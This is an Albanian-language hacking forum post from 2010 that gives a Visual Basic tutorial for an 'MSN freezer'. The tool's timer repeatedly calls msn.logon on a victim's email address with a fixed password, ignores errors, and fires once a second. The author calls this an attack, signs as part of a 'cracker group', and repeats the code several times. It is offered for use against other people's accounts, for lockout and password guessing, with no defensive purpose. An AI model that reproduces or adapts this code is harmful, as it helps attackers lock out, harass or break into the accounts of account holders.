Krijo msn freezer

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë

Krijo msn freezer

Mesazh  EliTe Crew prej Tue Jun 15, 2010 9:36 pm

E HaPiM Në standard exe
shkojm Tek Project > Referencesaty tani e gjejm MSN Type Library e klickojm at the tani shtypim ok

Qka na duhet?
Na duhen ni Textbox, ni timer dhe 2 Command Buttons

Tani shkojm keshtu:
klikojm tek timeri dhe e qesim Timer1.Enabled = False




Quote:
Dim msn as NewMsgrObject


Pra kjo ashte Msn Type library qe e shtypem ma heret...

Tani klickojm dy her tek CommandButton 1 the shkojm tek kodi:
Code:


Quote:
Private Sub Command1_Click () Timer1.Enabled = True End Sub


kur te shtypsh buttonin freezer ja nis punon

Tani Per te ndaler Sulmin shkojm keshtu:



Quote:
Private Sub Command2_Click () Timer1.Enabled = False End Sub


Tani e hapim Formin:


Quote:
Private Sub Form_Load Timer1.Interval = 1000 Timer1.Enabled = False End Sub


pra me interval asht 1 sekund pra qdo 1 sekond e provon ni password ne at email.

tani e shtypim 2 her Timerin dhe hapet codi:


Quote:
Private Sub Timer1.Timer () On Error Resume Next msn.logon Text1.Text, "123456", msn.Services.PrimaryService End Sub


ketu i tregojm programmit se ne qoft se dalin Errora me vazhdu. dhe me msn.logon provojm me ba login ne msn...

Dim msn as NewMsgrObject - pra ky se pari vjen tek scourci per te par scourcin vetem shko tek View tani Code


Code:
Private Sub Command1_Click ()
Timer1.Enabled = True
End Sub

Private Sub Command2_Click ()
Timer1.Enabled = False
End Sub

Private Sub Form_Load
Timer1.Interval = 1000
Timer1.Enabled = False
End Sub

Private Sub Timer1.Timer ()
On Error Resume Next
msn.logon Text1.Text, "123456", msn.Services.PrimaryService
End Sub




Kjo Ështe Për Buttonin 1 Pra Me Fillu Programi


Quote:

Private Sub Command1_Click () Timer1.Enabled = True End Sub


Kjo Ështe Për Me NdaL Për Komanden Nr 2


Quote:

Private Sub Command2_Click () Timer1.Enabled = False End Sub


Kjo Shkon teKk form1


Quote:
Private Sub Form_Load Timer1.Interval = 1000 Timer1.Enabled = False End Sub


dhe kta e qet tek timeri pra klikon 2 her tek timeri


Quote:
Private Sub Timer1.Timer () On Error Resume Next msn.logon Text1.Text, "123456", msn.Services.PrimaryService End Sub

EliTe Crew

Numri i postimeve : 158
Join date : 13/06/2010
Age : 24
Location : united cracker group

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye

- Similar topics

 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi